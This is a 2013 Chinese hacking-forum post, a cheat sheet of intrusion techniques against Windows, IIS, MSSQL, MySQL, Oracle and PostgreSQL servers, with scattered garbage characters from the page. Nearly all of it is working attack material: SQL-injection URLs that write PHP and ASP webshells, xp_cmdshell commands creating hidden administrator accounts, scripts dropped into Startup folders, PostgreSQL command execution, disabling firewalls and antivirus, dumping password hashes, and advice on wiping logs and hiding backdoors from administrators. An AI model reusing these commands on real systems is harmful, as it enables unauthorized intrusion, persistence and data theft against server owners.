中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

---

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全

1.net user administrator /passwordreq:no
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
) n; c3 ?1 |$ `2.比较巧妙的建克隆号的步骤
先建一个user的用户
然后导出注册表。然后在计算机管理里删掉
6 b( t$ Y! U) C- @) `9 t$ [" R4 i在导入，在添加为管理员组
3.查radmin密码
4 P# W$ u5 R& N  I1 L2 `( }+ ~reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
; @5 R5 r4 q# q  ^. A4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
: G( b9 @. m5 ]2 e. d: g" [建立一个"services.exe"的项
( E2 ?& e& @+ H/ r5 E6 n  q$ l2 |% |再在其下面建立(字符串值)
键值为mu ma的全路径
( W, j/ s( Z# F+ J0 C5.runas /user:guest cmd
测试用户权限！
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解，输入/?看看吧。（这个是需要管理员权限的哦）建立相同用户通过ntml验证就不必我说了吧？
7.入侵后漏洞修补、痕迹清理，后门置放：
2 e' Z5 G; n$ z9 j- W基础漏洞必须修补，如SU提权，SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录；你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好，使用查询分析器会留下记录，位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之；IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录，如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个，标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴，如果这个机器只是台普通的肉鸡，放个TXT到管理员桌面吧~提醒他你入侵了，放置了某个后门，添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
4 E0 k% ~/ g5 E; O
" l9 X( p% Q8 Z/ O% R; e- O* Z2 Rfor example
2 ]# ]2 y+ p1 f) G
# i- ~& G  J! L0 L/ U% r6 z0 wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
  Z; C2 i+ s8 k4 U( C
6 i# Y) O: v7 z5 Q0 g9 f  jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
1 {0 h" Z  ~. q2 ~
9 Y* x4 r! F8 b2 a6 {9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
' S$ k1 S- N0 x  E6 O3 x如果要启用的话就必须把他加到高级用户模式
可以直接在注入点那里直接注入
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
. S( X# R  l6 F" I然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
4 p3 i/ d/ U% Q1 h9 D! L8 ]或者
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
来恢复cmdshell。
+ S. F# m' w" R& a
# d: Y7 u% ]5 d  W  \0 z分析器
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10.xp_cmdshell新的恢复办法
$ L& q0 E$ L# rxp_cmdshell新的恢复办法
扩展储存过程被删除以后可以有很简单的办法恢复：
删除
; f" w7 ?$ I( O: rdrop procedure sp_addextendedproc
drop procedure sp_oacreate
! }; c: `/ K8 R7 j2 @exec sp_dropextendedproc 'xp_cmdshell'
. I( n7 b( Q) E$ b! Y; a
恢复
: j" r9 A. |0 i* R7 Sdbcc addextendedproc ("sp_oacreate","odsole70.dll")
1 i2 y, P4 W) d# odbcc addextendedproc ("xp_cmdshell","xplog70.dll")

这样可以直接恢复，不用去管sp_addextendedproc是不是存在

2 |) z7 q& L% `0 f3 ]# a3 L-----------------------------
0 d. H; W( h8 Y7 u% D7 s
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
1 C( E( f$ i; n# b! v
恢复cmdshell的sql语句
8 X, `8 a8 w! u5 ^: P& ^4 qexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
& K  q: j: [* g: K9 B  t

0 \3 z6 H: c) ]$ X$ @3 y: m开启cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
& H3 {3 Q5 j* F6 b
- ^& ~0 P6 n; `4 q4 L, X; P, Y判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
5 D0 |3 |# @. z
2 ~) t7 }5 L) N恢复xp_cmdshell
7 U: t9 B+ O- s- ^/ f; ?' `$ Zexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
) K: R7 r" Y  w# G+ Z返回结果为1就ok
5 O: O% `2 q) r/ x, f: v; X" {
* k* J' M) `6 v- u4 x  b3 \否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
3 ?; H% h- |) p0 D" Y
& s; E0 s9 a2 K" K; ~" G- l% `% m堵上cmdshell的sql语句
5 \9 y5 E* j: D% I) a2 |sp_dropextendedproc "xp_cmdshel
8 j% W$ q& K) e0 Q6 V$ r-------------------------
3 B+ T( ?5 Q4 L- U0 Z清除3389的登录记录用一条系统自带的命令：
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
$ U7 T4 f# k8 ]
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
在 mysql里查看当前用户的权限
) {7 T& _/ K5 E/ p0 I; Nshow grants for  
! D& o- U" k. V! E
7 d& J# p8 T2 y9 n5 P( @以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql，只可以本地连，对外拒绝连接。以下方法可以帮助你解决这个问题了，下面的语句功能是，建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
; i! U# c+ y( n
$ D3 q4 o" k5 O3 b4 s2 k2 A! \
: z) u3 P0 O9 g/ u  [9 qCreate USER 'itpro'@'%' IDENTIFIED BY '123';
- f4 l- x! W) S" x! H
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
2 m) }; L1 _* k3 E  }6 e! G0 ^
# s& e3 w) ^3 T$ W- MMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0

: K) B% K% m4 W2 f; pMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
/ j5 F9 ]4 O3 M
搞完事记得删除脚印哟。
, ^+ R3 W) B6 a) X
Drop USER 'itpro'@'%';

6 k' k6 x. y% ?2 s$ cDrop DATABASE IF EXISTS `itpro` ;

当前用户获取system权限
8 f, u7 v9 ?1 q2 Psc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
程序代码
' n3 i- `" s" O. d" U# H3 z<SCRIPT LANGUAGE="VBScript">
: v) W( H$ o8 [4 |* nset wsnetwork=CreateObject("WSCRIPT.NETWORK")
" D' e% l4 `( q3 A: Kos="WinNT://"&wsnetwork.ComputerName
* K; J( y' o; A8 o# g7 tSet ob=GetObject(os)
& Y# ^5 J$ g1 j# Y% ~1 y; g9 OSet oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
* A. M% {4 I* u4 ?1 d3 aod.SetInfo
7 }5 T4 U, I+ F& d6 m# OSet of=GetObject(os&"/nosec",user)
oe.add os&"/nosec"
! u/ l8 ^; H) O$ l$ E  c</Script>
- ~3 B' }6 x5 r+ b4 v<script language=javascript>window.close();</script>
7 ^) ]: E1 A* X
" ^& A+ ^% d# ]1 i


8 }: G( Q& T' F0 r. L: o' [( x突破验证码限制入后台拿shell
程序代码
! e0 J0 W+ }, M: o+ ?+ A' u' C7 \REGEDIT4
1 b: Z4 e* j0 F! F[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
; l  A( B, `6 Y/ n3 U. p/ ^"BlockXBM"=dword:00000000

: q/ ~  i$ G: p; f4 B保存为code.reg，导入注册表，重器IE
就可以了
union写马
5 e- w4 T% J% g) C程序代码
4 t/ j& c) B- v6 ~www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

* K8 t; D/ W' J* C0 q/ e' Z% ^应用在dedecms注射漏洞上,无后台写马
dedecms后台，无文件管理器，没有outfile权限的时候
% Y3 d7 N3 |' ^1 R0 D# Z0 }在插件管理-病毒扫描里
写一句话进include/config_hand.php里
0 V3 {* Q1 Y( o/ G, ]程序代码
8 m4 _9 u7 @* s/ S>';?><?php @eval($_POST[cmd]);?>
. S+ n5 T6 A' N1 a  C
3 M- A$ B, X  {' X8 G# I, _+ j$ v
/ k: z9 J7 U( \, J7 [如上格式

# l! H$ K* e. q; horacle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
程序代码
select username,password from dba_users;
3 R  m+ b( b5 @0 h

. x9 s% \6 d2 T+ p7 |. Kmysql远程连接用户
程序代码
/ Z0 V9 u( H- D; f7 p
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
6 q# V: M; Z: X  t3 V# i  |GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;


& {9 I! P; M+ @) {% g, r8 t0 r
  H, }2 Y2 m; ]
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

1.查询终端端口

xp&2003：REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
0 J# s- l- N! X6 w# T  [5 E
通用：regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2.开启XP&2003终端服务

0 N: p+ `" x  ?5 W" L, D
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


; Z! A9 C! H; qREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

; z4 X% ?! N6 H# y! R) ]3.更改终端端口为20008(0x4E28)

/ D  z! a7 Q% r7 `" A' I# hREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

  K) {* L7 E" y+ x; l5 X% j, j  MREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

/ c9 |: V5 y' }( M* w2 g4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f


5.开启Win2000的终端，端口为3389(需重启)

$ B  }4 h- g+ d: N% ?/ X$ gecho Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
% n, N4 G, [- L; ^/ Oecho "Enabled"="0" >>2000.reg
* f  u/ F5 r, F& n9 b4 I  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
6 w- ?6 u( j% ]- t" V" y! recho "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
, _9 V* C5 O& J7 \$ Vecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
- k4 E* i/ L2 y& Y4 O: ~echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
3 f; M8 p# x1 p/ x3 Oecho "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
, |( x7 r- i& e- J6 z) ]4 |echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
- P2 c+ L) N4 ^. \' ~  T. a2 f- Gecho "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
# i4 y/ F: k3 r; c# @6 y5 Yecho "ortNumber"=dword:00000D3D >>2000.reg
! ]- C; F+ S1 n+ Q( zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "ortNumber"=dword:00000D3D >>2000.reg
- F" v& T# k% `& `2 ~' C5 }; }
9 ~/ [# j0 W7 T4 Q' S1 c6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
! Q/ }% S# e) w( l/ O
* L2 h5 ^: }/ f; |@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
& k7 i8 h- x8 x) i: l(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
* i, }2 _5 p1 u8 k) R) f# e' |echo [defaultinstall] >> restart.inf
. y3 M, T4 u6 N, x" }5 f) _rundll32 setupapi,%inf% 1 %temp%\restart.inf
$ J' R9 Q% z+ L/ M

5 X  q* H+ d: H- I! ?7.禁用TCP/IP端口筛选 (需重启)
1 N0 A+ c9 a" T
& x8 z! ~8 e5 p3 C, iREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8 A7 t, u" Q4 H; k
8.终端超出最大连接数时可用下面的命令来连接

. i; y3 W- V2 R3 h2 Cmstsc /v:ip:3389 /console
" V" o/ }! \3 Y, E, h; \1 n# q
9.调整NTFS分区权限

cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
$ \5 y7 h% c0 e* f; s' ~& ]% _
, V& W% j" e, h! T+ h7 ~cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
3 }4 d2 f' O8 w/ B+ C8 I! O' @
------------------------------------------------------
' ^* d4 F/ y( U/ I: [# ?3389.vbs
$ a2 v$ j) p* d. U& J2 D2 X9 OOn Error Resume Next
! i( W0 V% Q+ n# c' a' R% e! d) e% ]/ @const HKEY_LOCAL_MACHINE = &H80000002
5 F2 a6 J& q7 y4 S; [3 [& U6 |  ?strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
5 Z; _. E$ ^; ostrComputer & "\root\default:StdRegProv")
; x9 F/ p) A1 S& i+ _strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
+ j( d+ j; o9 ~$ k4 ~! Xoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' ]  Z- O" D& MstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
* i% H5 a6 A+ j, D1 t. VstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
2 x1 r% G: }4 o- z) c0 Doreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
! g* L4 i3 m! GstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "ortNumber"
1 ]7 \" y, e) F/ r/ Q% N, JdwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "ortNumber"
# C) f. Q  P5 r% _- ~. ^dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
& h! C+ v! G  E$ S$ k  vSet R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")

删除awgina.dll的注册表键值
程序代码

7 s3 D7 R6 i6 v9 H) I& t5 C  kreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
& Z' h; F4 D6 B& M" |/ ?' k1 G

: x+ m/ j) V1 L+ g( y3 d

# b+ f5 j' z( B+ t, l+ i3 q5 Q程序代码
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
  B' g4 S* S/ y+ Z; \( [+ k2 F* a
: p9 k% L3 Y0 `7 O; o: e设置为1，关闭LM Hash
* s  v$ y3 I$ M: e+ a# ^2 s
- \9 E/ ?7 E' L* B- e数据库安全:入侵Oracle数据库常用操作命令
& E3 W! o. }+ J- S( F最近遇到一个使用了Oracle数据库的服务器，在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦，为了兄弟们以后少走些弯路，我把入侵当中必需的命令整理出来。
) ]" ]! H! z% \1、su – oracle 不是必需，适合于没有DBA密码时使用，可以不用密码来进入sqlplus界面。
8 d2 C: {. f/ f6 _. e2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
9 b0 t* N1 V; a# K4 f1 }3、SQL>connect / as sysdba ;（as sysoper）或
2 ]  f  n7 b2 D0 dconnect internal/oracle AS SYSDBA ;(scott/tiger)
conn sys/change_on_install as sysdba;
4、SQL>startup; 启动数据库实例
5、查看当前的所有数据库: select * from v$database;
select name from v$database;
( _4 }3 N5 r7 Q* }2 D6、desc v$databases; 查看数据库结构字段
1 N: W5 H  {, ^5 t) v- ]% c7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
' ]+ o1 F( ]. l8 e- gSQL>select * from V_$PWFILE_USERS;
3 n6 }  e0 h5 B! G9 N7 {  H: J# C1 e8 IShow user;查看当前数据库连接用户
8、进入test数据库：database test;
9、查看所有的数据库实例：select * from v$instance；
+ U& R) o9 A! I- r如：ora9i
9 L1 e' E3 X- W0 f10、查看当前库的所有数据表：
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
2 M$ y; w- k) M+ WTABLE_NAME
. R8 P( X  Q# \8 x& i! J3 `------------------------------
. |  o7 d1 Y6 t& \  O+ X4 j_default_auditing_options_
11、查看表结构：desc all_tables;
12、显示CQI.T_BBS_XUSER的所有字段结构：
desc CQI.T_BBS_XUSER;
13、获得CQI.T_BBS_XUSER表中的记录：
; _& n1 I. v. [% a, hselect * from CQI.T_BBS_XUSER;
6 E' A3 I" j. H& R14、增加数据库用户：(test11/test)
; q4 [$ z. X+ C, h6 y% c6 h) ^create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15、用户授权:
grant connect,resource,dba to test11;
. X, V& J' i8 a) H9 W$ Qgrant sysdba to test11;
commit;
2 A, E$ |: @0 w" i16、更改数据库用户的密码：(将sys与system的密码改为test.)
% X" K* ?8 i9 z% R6 Y6 w0 Ealter user sys indentified by test;
alter user system indentified by test;
7 e: p+ P$ @$ s: t) P6 D
9 N" d( M3 n3 x- z, V4 D* ]% ]  |applicationContext-util.xml
applicationContext.xml
9 f3 P) Q$ M, j% h8 V& c; Hstruts-config.xml
web.xml
, U0 c: C. C/ x1 Rserver.xml
: r6 s2 X/ ]% k# G4 u5 @tomcat-users.xml
hibernate.cfg.xml
. w" l* w( B& S7 d  ldatabase_pool_config.xml
4 s' \7 m2 {8 Y1 d# V: i1 T+ ^
8 F6 ~4 t7 [% e  _* h
4 p8 a* L  }0 t3 T5 \6 _\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
\WEB-INF\struts-config.xml  文件目录结构

1 Z. r6 B5 [- c  E# Fspring.properties 里边包含hibernate.cfg.xml的名称
6 o* a( v( D" s

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

0 \& L; x5 ?6 k! l: Y; L( R  }! ^8 t如果都找不到  那就看看class文件吧。。

+ R. K- k. W7 B5 a测试1：
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
) |8 Q* q9 {: E  [# S
! t, |9 x0 q7 t: _% a/ M1 U* q测试2：

$ E0 ~9 h) A  k% ^create table dirs(paths varchar(100),paths1 varchar(100), id int)
! E: \. @* j- o* g
1 Z7 c0 ]& L/ Vdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

查看虚拟机中的共享文件：
在虚拟机中的cmd中执行
9 |( R4 Y: v3 u0 G\\.host\Shared Folders
' j+ r  w' {9 T+ g
8 I9 E, r, C% v: \cmdshell下找终端的技巧
! N/ H6 @) P5 z/ }+ C  t3 H找终端：
: s) {$ ~5 X8 d/ V2 s' R# ^1 H第一步: Tasklist/SVC 列出所有进程，系统服务及其对应的PID值!
　　 而终端所对应的服务名为：TermService
" [6 B8 D$ |( l, F9 Q1 M第二步：用netstat -ano命令，列出所有端口对应的PID值!
' I' p1 {2 ~) O. I. W/ B　　 找到PID值所对应的端口
: j$ V0 P6 v1 e+ {
查询sql server 2005中的密码hash
SELECT password_hash FROM sys.sql_logins where name='sa'
6 w" I+ z4 n! B$ V0 k4 H" u5 TSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
' u8 H" S; O% F* d* Qaccess中导出shell

中文版本操作系统中针对mysql添加用户完整代码：

6 T* B/ \. Z9 i5 }; u6 U' Suse test;
* E5 h# p: _8 bcreate table a (cmd text);
" d" a3 v$ h1 \, T6 V! N5 [5 {  Einsert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
0 O5 Y  K8 G) }3 v: tdrop table a;
7 X8 X: C0 u( Q9 u% J7 L/ O0 t3 j
英文版本：
+ k6 @) r; d+ h' T; k8 E/ L
use test;
8 d. s# ?% I1 s* |$ Q! b8 dcreate table a (cmd text);
) p% w  O& Z' iinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
1 ?* ]+ _  z) K7 Iinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
8 g$ D" ^$ j/ t0 _drop table a;

create table a (cmd BLOB);
insert into a values （CONVERT(木马的16进制代码,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
1 o8 ~! N6 [/ A0 Qdrop table a;
2 E$ O: L' ~, L4 v& [( L
记录一下怎么处理变态诺顿
' |% Z, F0 C  }( r/ Z查看诺顿服务的路径
sc qc ccSetMgr
然后设置权限拒绝访问。做绝一点。。
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
+ p8 a: ~* z. {8 Ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

然后再重启服务器
" z. |0 G  B% A( t6 o, r- V4 Iiisreset /reboot
) J  f9 |/ T' J, c. h! M2 S这样就搞定了。。不过完事后。记得恢复权限。。。。
8 D, x" d, P4 b" m4 J; fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
" Z% c, X! T, a2 W" r( \cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
  B- |7 T0 p  k, j$ ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

postgresql注射的一些东西
如何获得webshell
5 `4 k* T- j' a4 shttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
如何读文件
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
$ a2 A$ z  V: o; K2 z
z执行命令有两种方式，一种是需要自定义的lic函数支持，一种是用pl/python支持的。
# B8 I: ?1 c0 X' V- `当然，这些的postgresql的数据库版本必须大于8.X
- `: K' c( Z. ^: T9 ?! o4 z创建一个system的函数：
* s4 v- k1 L2 c: F8 \3 _CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
# ]4 I3 W+ B" u+ x6 f' N7 Y
创建一个输出表：
% ]" \. g# [$ G. t# h! xCREATE TABLE stdout(id serial, system_out text)

执行shell，输出到输出表内：
SELECT system('uname -a > /tmp/test')

copy 输出的内容到表里面；
$ s) f1 w  b: N: R) k+ z# zCOPY stdout(system_out) FROM '/tmp/test'

从输出表内读取执行后的回显，判断是否执行成功
; N. t0 L" P5 F2 J7 ]. `3 i$ ~
, c& `& b  K! j$ ~' h6 PSELECT system_out FROM stdout
下面是测试例子

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
STRICT --

# C2 v$ u. q7 Q( j/ v- u/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
net stop sharedaccess    stop the default firewall
netsh firewall show      show/config default firewall
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
: j7 ]) y) [8 o5 E% w: C修改3389端口方法（修改后不易被扫出）
修改服务器端的端口设置,注册表有2个地方需要修改

% Q$ H" K1 Y) X& P- g. f* ~. G[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
PortNumber值，默认是3389，修改成所希望的端口，比如6000
# K1 Q; h; G" P3 p+ b
第二个地方：
5 D8 l, G+ j0 F6 Y2 [, {8 {[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　
PortNumber值，默认是3389，修改成所希望的端口，比如6000

现在这样就可以了。重启系统就可以了

* N6 E8 ?. @1 y; b9 {. _) X0 c4 g查看3389远程登录的脚本
  z, v# j. v5 y' ^7 b$ K1 l保存为一个bat文件
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
& x9 \- V* |8 Knetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
& F) v, R0 N" ^# k
mstsc的参数：
! I8 |" d& F6 @1 L3 n) J
6 h8 [+ t/ P! e( h5 q远程桌面连接

, l. L# c, R" R1 Q$ _' ?MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
